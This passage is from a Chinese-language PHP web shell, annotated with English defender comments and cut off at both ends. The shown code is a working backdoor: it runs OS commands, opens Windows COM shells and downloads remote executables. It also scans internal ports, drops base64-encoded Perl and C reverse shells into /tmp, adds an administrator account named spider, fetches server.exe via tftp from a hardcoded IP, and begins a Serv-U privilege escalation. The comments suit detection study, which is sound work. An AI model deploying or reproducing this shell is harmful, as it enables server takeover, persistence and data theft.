		// sfb: "a" = include subfolders.
		$sfb = ($_POST[\'sfb\'] == \'a\') ? true : false;
		echo Findfile_Auto($_POST[\'sfp\'],$_POST[\'sfc\'],$_POST[\'sft\'],$sff,$sfb) ? \'搜索完毕\' : \'异常终止\';
		echo \'</div>\';
	}
	return true;
}

//系统信息

// Info_Cfg: read one php.ini setting with get_cfg_var() and render it for the info
// table: a value that compares equal to 0 becomes "No", equal to 1 becomes "Yes",
// anything else is returned as read. The switch uses loose comparison.
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
// Info_Fun: report whether a function name is available in this runtime, as the
// string "Yes" or "No" (function_exists). Used by the info table as a proxy for
// which extensions are loaded.
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
// Info_f: print an HTML table describing the host and the PHP runtime, then return
// true. It reads only server variables, php.ini values and function availability.
// Defender note: this is the reconnaissance page of the shell. What it collects
// (disable_functions, allow_url_fopen, enable_dl, free disk space, available
// database and socket functions) tells the operator which of the other features can
// work on this host. Values are written into the table without HTML escaping.
function Info_f()
{
	$dis_func = get_cfg_var("disable_functions");
	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
	// Administrator contact: SERVER_ADMIN when the server sets it, else sendmail_from.
	$adminmail = (isset($_SERVER[\'SERVER_ADMIN\'])) ? "<a href=\"mailto:".$_SERVER[\'SERVER_ADMIN\']."\">".$_SERVER[\'SERVER_ADMIN\']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
	// Show the disabled-function list one name per line, or "No" when it is empty.
	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}
	// phpinfo() is reported as usable unless its name appears in disable_functions.
	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
	// Rows of the table: label, value.
	$info = array(
		array("服务器时间",date("Y年m月d日 h:i:s",time())),
		array("服务器域名","<a href=\"http://".$_SERVER[\'SERVER_NAME\']."\" target=\"_blank\">".$_SERVER[\'SERVER_NAME\']."</a>"),
		array("服务器IP地址",gethostbyname($_SERVER[\'SERVER_NAME\'])),
		array("服务器操作系统",PHP_OS),
		array("服务器操作系统文字编码",$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']),
		array("服务器解译引擎",$_SERVER[\'SERVER_SOFTWARE\']),
		array("你的IP",getenv(\'REMOTE_ADDR\')),
		array("Web服务端口",$_SERVER[\'SERVER_PORT\']),
		array("PHP运行方式",strtoupper(php_sapi_name())),
		array("PHP版本",PHP_VERSION),
		array("运行于安全模式",Info_Cfg("safemode")),
		array("服务器管理员",$adminmail),
		array("本文件路径",__FILE__),
		array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
		array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
		array("显示错误信息 display_errors",Info_Cfg("display_errors")),
		array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
		array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
		array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
		array("允许最大上传文件 upload_max_filesize",$upsize),
		array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
		array("被禁用的函数 disable_functions",$dis_func),
		array("phpinfo()",$phpinfo),
		array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).\'Mb\'),
		array("图形处理 GD Library",Info_Fun("imageline")),
		array("IMAP电子邮件系统",Info_Fun("imap_close")),
		array("MySQL数据库",Info_Fun("mysql_close")),
		array("SyBase数据库",Info_Fun("sybase_close")),
		array("Oracle数据库",Info_Fun("ora_close")),
		array("Oracle 8 数据库",Info_Fun("OCILogOff")),
		array("PREL相容语法 PCRE",Info_Fun("preg_match")),
		array("PDF文档支持",Info_Fun("pdf_close")),
		array("Postgre SQL数据库",Info_Fun("pg_close")),
		array("SNMP网络管理协议",Info_Fun("snmpget")),
		array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
		array("XML解析",Info_Fun("xml_set_object")),
		array("FTP",Info_Fun("ftp_login")),
		array("ODBC数据库连接",Info_Fun("odbc_close")),
		array("Session支持",Info_Fun("session_start")),
		array("Socket支持",Info_Fun("fsockopen")),
	);
	echo \'<table width="100%" border="0">\';
	for($i = 0;$i < count($info);$i++){echo \'<tr><td width="40%">\'.$info[$i][0].\'</td><td>\'.$info[$i][1].\'</td></tr>\'."\n";}
	echo \'</table>\';
	return true;
}

//执行命令

// Exec_Run: run the string $cmd as an operating-system command and return whatever
// it printed. The first available of exec, shell_exec, system, passthru and popen
// is used; when none is available the empty string is returned.
// Defender note: $cmd reaches the shell unmodified and callers pass request data
// straight in. Because of the fallback chain, a disable_functions list has to cover
// all five names to close this path, and a command interpreter started as a child
// of the web server or PHP worker process is the runtime signal to alert on.
function Exec_Run($cmd)
{
	$res = \'\';
	// exec() fills an array of output lines, joined back into one string.
	if(function_exists(\'exec\')){@exec($cmd,$res);$res = join("\n",$res);}
	elseif(function_exists(\'shell_exec\')){$res = @shell_exec($cmd);}
	// system() and passthru() print directly, so their output is captured with
	// output buffering.
	elseif(function_exists(\'system\')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
	elseif(function_exists(\'passthru\')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
	// Last resort: read the command output from a pipe in 1024-byte chunks.
	elseif(@is_resource($f = @popen($cmd,"r"))){$res = \'\';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
	return $res;
}



// Exec_g: request handler for the command page (form action ?s=g). A non-empty
// POST cmd is passed to Exec_Run and its output is shown in a textarea; the form is
// printed in every case and the function returns true.
// Defender note: the preset commands in the form are Windows commands that create a
// local account named spider, add it to the administrators group, list connections
// and interfaces, copy a file, and fetch server.exe over tftp from 219.134.46.245.
// On a host where this shell was found, check for that account name, for tftp
// launched by the web server account, and for that address in egress logs.
// $cmd and $res are interpolated into the page without HTML escaping.
function Exec_g()
{
	// Placeholder text for the output box and default command.
	$res = \'回显窗口\';
	$cmd = \'dir\';
	if(!empty($_POST[\'cmd\'])){$res = Exec_Run($_POST[\'cmd\']);$cmd = $_POST[\'cmd\'];}
print<<<END
<script language="javascript">
function sFull(i){
	Str = new Array(11);
	Str[0] = "dir";
	Str[1] = "net user spider spider /add";
	Str[2] = "net localgroup administrators spider /add";
	Str[3] = "netstat -an";
	Str[4] = "ipconfig";
	Str[5] = "copy c:\\1.php d:\\2.php";
	Str[6] = "tftp -i 219.134.46.245 get server.exe c:\\server.exe";
	document.getElementById(\'cmd\').value = Str[i];
	return true;
}
</script>
<form method="POST" name="gform" id="gform" action="?s=g"><center><div class="actall">
命令参数 <input type="text" name="cmd" id="cmd" value="{$cmd}" style="width:399px;">
<select onchange=\'return sFull(options[selectedIndex].value)\'>
<option value="0" selected>--命令集合--</option>
<option value="1">添加管理员</option>
<option value="2">设为管理组</option>
<option value="3">查看端口</option>
<option value="4">查看地址</option>
<option value="5">复制文件</option>
<option value="6">FTP下载</option>
</select>
<input type="submit" value="执行" style="width:80px;"></div>
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center>
</form>
END;
	return true;
}

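//组件接口 (COM component interface)
// Com_h() below is selected with GET parameter o. For the adodb, wscript and
// application choices it instantiates a Windows COM object via new COM(...): adodb
// opens a POSTed connection string and executes a POSTed SQL statement, wscript and
// application run POSTed commands. The downloader choice fetches a POSTed URL with
// file_get_contents() and writes it to a POSTed path. The COM paths need a Windows
// PHP build with the COM extension loaded, so leaving that extension off where it is
// not required removes them; the downloader depends on allow_url_fopen.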

function Com_h()
{
	$object = isset($_GET[\'o\']) ? $_GET[\'o\'] : \'adodb\';
print<<<END
<div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> 
<a href="?s=h&o=wscript">[WScript.shell]</a> 
<a href="?s=h&o=application">[Shell.Application]</a> 
<a href="?s=h&o=downloader">[Downloader]</a></div>
<form method="POST" name="hform" id="hform" action="?s=h&o={$object}">
END;
if($object == \'downloader\')
{
	$Com_durl = isset($_POST[\'durl\']) ? $_POST[\'durl\'] : \'http://www.baidu.com/down/muma.exe\';
	$Com_dpath= isset($_POST[\'dpath\']) ? $_POST[\'dpath\'] : File_Str(dirname(__FILE__).\'/muma.exe\');
print<<<END
<div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div>
<div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div>
<div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form>
END;
	if((!empty($_POST[\'durl\'])) && (!empty($_POST[\'dpath\'])))
	{
		echo \'<div class="actall">\';
		$contents = @file_get_contents($_POST[\'durl\']);
		if(!$contents) echo \'无法读取要下载的数据\';
		else echo File_Write($_POST[\'dpath\'],$contents,\'wb\') ? \'下载文件成功\' : \'下载文件失败\';
		echo \'</div>\';
	}
}
elseif($object == \'wscript\')
{
	$cmd = isset($_POST[\'cmd\']) ? $_POST[\'cmd\'] : \'dir\';
print<<<END
<div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
	if(!empty($_POST[\'cmd\']))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'wscript\');
		$exe = @$shell->exec("cmd.exe /c ".$cmd);
		$out = $exe->StdOut();
		$output = $out->ReadAll();
		echo \'<pre>\'.$output.\'</pre>\';
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
elseif($object == \'application\')
{
	$run = isset($_POST[\'run\']) ? $_POST[\'run\'] : \'cmd.exe\';
	$cmd = isset($_POST[\'cmd\']) ? $_POST[\'cmd\'] : \'copy c:\windows\php.ini c:\php.ini\';
print<<<END
<div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div>
<div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>
END;
	if(!empty($_POST[\'run\']))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'application\');
		echo (@$shell->ShellExecute($run,\'/c \'.$cmd) == \'0\') ? \'执行成功\' : \'执行失败\';
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
elseif($object == \'adodb\')
{
	$string = isset($_POST[\'string\']) ? $_POST[\'string\'] : \'\';
	$sql = isset($_POST[\'sql\']) ? $_POST[\'sql\'] : \'\';
print<<<END
<script language="javascript">
function hFull(i){
	if(i==0 || i==5) return false;
	Str = new Array(12);  
	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
	Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'spider\',\'mypass\')";
	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
	Str[9] = "UPDATE [TableName] SET USER=\'spider\' WHERE ID=100";
	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
	Str[11] = "DROP TABLE [TableName]";
	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
	if(i<=4){document.getElementById(\'string\').value = Str[i];}else{document.getElementById(\'sql\').value = Str[i];}
	return true;
}
</script>
<div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;">
<select onchange="return hFull(options[selectedIndex].value)">
<option value="0" selected>--连接示例--</option>
<option value="1">Access连接</option>
<option value="2">MsSql连接</option>
<option value="3">MySql连接</option>
<option value="4">Oracle连接</option>
<option value="5">--SQL语法--</option>
<option value="6">显示数据</option>
<option value="7">添加数据</option>
<option value="8">删除数据</option>
<option value="9">修改数据</option>
<option value="10">建数据表</option>
<option value="11">删数据表</option>
<option value="12">添加字段</option>
<option value="13">删除字段</option>
</select></div>
<div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div>
<div class="actall"><input type="submit" value="执行" style="width:80px;"></div>
</form>
END;
	if(!empty($string))
	{
		echo \'<div class="actall">\';
		$shell = new COM(\'adodb\');
		@$shell->Open($string);
		$result = @$shell->Execute($sql);
		$count = $result->Fields->Count();
		for($i = 0;$i < $count;$i++){$Field[$i] = $result->Fields($i);}
		echo $result ? $sql.\' 执行成功<br>\' : $sql.\' 执行失败<br>\';
		if(!empty($count)){while(!$result->EOF){for($i = 0;$i < $count;$i++){echo htmlspecialchars($Field[$i]->value).\'<br>\';}@$result->MoveNext();}}
		$shell->Close();
		@$shell->Release();
		$shell = NULL;
		echo \'</div>\';
	}
}
	return true;
}

//扫描端口

// Port_i: request handler for the port scan page (form action ?s=i). With POST ip
// and port set, it tries a TCP connection to each port of the pipe-separated list
// and prints whether it opened. The form is printed in every case; returns true.
// Defender note: the connections originate from the web server itself, so the scan
// sees whatever that host can reach, including loopback (the preset target) and
// internal networks behind the perimeter. Restricting outbound connections from the
// web tier and alerting on bursts of short-lived connections from the PHP process
// address this. Form values are interpolated without HTML escaping.
function Port_i()
{
	$Port_ip = isset($_POST[\'ip\']) ? $_POST[\'ip\'] : \'127.0.0.1\';
	$Port_port = isset($_POST[\'port\']) ? $_POST[\'port\'] : \'21|23|25|80|110|135|139|445|1433|3306|3389|43958\';
print<<<END
<form method="POST" name="iform" id="iform" action="?s=i">
<div class="actall">扫描IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall">端口号 <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
<div class="actall"><input type="submit" value="扫描" style="width:80px;"></div>
</form>
END;
	if((!empty($_POST[\'ip\'])) && (!empty($_POST[\'port\'])))
	{
		echo \'<div class="actall">\';
		$ports = explode(\'|\', $_POST[\'port\']);
		for($i = 0;$i < count($ports);$i++)
		{
			// Connect attempt with a 2 second timeout; a usable socket counts as open.
			// The socket is not closed explicitly afterwards.
			$fp = @fsockopen($_POST[\'ip\'],$ports[$i],&$errno,&$errstr,2);
			echo $fp ? \'<font color="#FF0000">开放端口 ---> \'.$ports[$i].\'</font><br>\' : \'关闭端口 ---> \'.$ports[$i].\'<br>\';
			// Stream each result to the browser as soon as it is known.
			ob_flush();
			flush();
		}
		echo \'</div>\';
	}
	return true;
}

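//Linux提权 (Linux privilege escalation, per the original label)
// Linux_k() below base64-decodes an embedded helper ($back_connect_pl or
// $back_connect_c, names that suggest a connect-back program), writes it under /tmp
// (/tmp/spider_bc or /tmp/spider_bc.c) and launches it through Exec_Run with the
// POSTed yourip and yourport (form default port 12666). Detection: files with those
// names in /tmp, and perl, gcc or sh processes whose parent is the web server.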

function Linux_k()
{
	$yourip = isset($_POST[\'yourip\']) ? $_POST[\'yourip\'] : getenv(\'REMOTE_ADDR\');
	$yourport = isset($_POST[\'yourport\']) ? $_POST[\'yourport\'] : \'12666\';
print<<<END
<form method="POST" name="kform" id="kform" action="?s=k">
<div class="actall">你的地址 <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div>
<div class="actall">连接端口 <input type="text" name="yourport" value="12666" style="width:400px"></div>
<div class="actall">执行方式 <select name="use" >
<option value="perl">perl</option>
<option value="c">c</option>
</select></div>
<div class="actall"><input type="submit" value="开始连接" style="width:80px;"></div></form>
END;
	if((!empty($_POST[\'yourip\'])) && (!empty($_POST[\'yourport\'])))
	{
		echo \'<div class="actall">\';
		if($_POST[\'use\'] == \'perl\')
		{
			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
			echo File_Write(\'/tmp/spider_bc\',base64_decode($back_connect_pl),\'wb\') ? \'创建/tmp/spider_bc成功<br>\' : \'创建/tmp/spider_bc失败<br>\';
			$perlpath = Exec_Run(\'which perl\');
			$perlpath = $perlpath ? chop($perlpath) : \'perl\';
			echo Exec_Run($perlpath.\' /tmp/spider_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -l -n -v -p \'.$_POST[\'yourport\'] : \'执行命令失败\';
		}
		if($_POST[\'use\'] == \'c\')
		{
			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
			echo File_Write(\'/tmp/spider_bc.c\',base64_decode($back_connect_c),\'wb\') ? \'创建/tmp/spider_bc.c成功<br>\' : \'创建/tmp/spider_bc.c失败<br>\';
			$res = Exec_Run(\'gcc -o /tmp/angel_bc /tmp/angel_bc.c\');
			@unlink(\'/tmp/spider_bc.c\');
			echo Exec_Run(\'/tmp/spider_bc \'.$_POST[\'yourip\'].\' \'.$_POST[\'yourport\'].\' &\') ? \'nc -l -n -v -p \'.$_POST[\'yourport\'] : \'执行命令失败\';
		}
		echo \'<br>你可以尝试连接端口 (nc -l -n -v -p \'.$_POST[\'yourport\'].\') </div>\';
	}
	return true;
}

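//ServU提权 (Serv-U privilege escalation, per the original label)
// Servu_l() below is cut off on this page. The visible part builds a form that
// targets a Serv-U administration port (preset 43958) with a preset
// LocalAdministrator account and password, plus a command to run or an account to
// add. Mitigation implied by those presets: do not leave the Serv-U local
// administration account on vendor-default credentials.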

function Servu_l()
{
	$SUPass = isset($_POST[\'SUPass\']) ? $_POST[\'SUPass\'] : \'#l@$ak#.lk;0@P\';
print<<<END
<div class="actall"><a href="?s=l">[执行命令]</a> <a href="?s=l&o=adduser">[添加用户]</a></div>
<form method="POST">
	<div class="actall">ServU端口 <input name="SUPort" type="text" value="43958" style="width:300px"></div>
	<div class="actall">ServU用户 <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
	<div class="actall">ServU密码 <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET[\'o\'] == \'adduser\')
{
print<<<END
<div class="actall">帐号 <input name="user" type="text" value="spider" style="width:200px">
密码 <input name="password" type="text" value="spider" style="width:200px">
目录 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>
END;
}
else
{
print<<<END
<div class="actall">提权命令 <input name="SUCommand" type="text" value="net user spider spider /add & net localgroup administrators spider /add" style="width:600px"><br>
<input name="user" type="hidden" value="spider">
<input name="password" type="hidden" value="spider">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo \'<div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form>\';
	if((!empty($_POST[\'SUPort\'])) && (!empty($_POST[\'SUUser\'])) && (!empty($_POST[\'SUPass\'])))
	{
		echo \'<div class="actall">\';
		$sendbuf = "";
		$recvbuf = " 
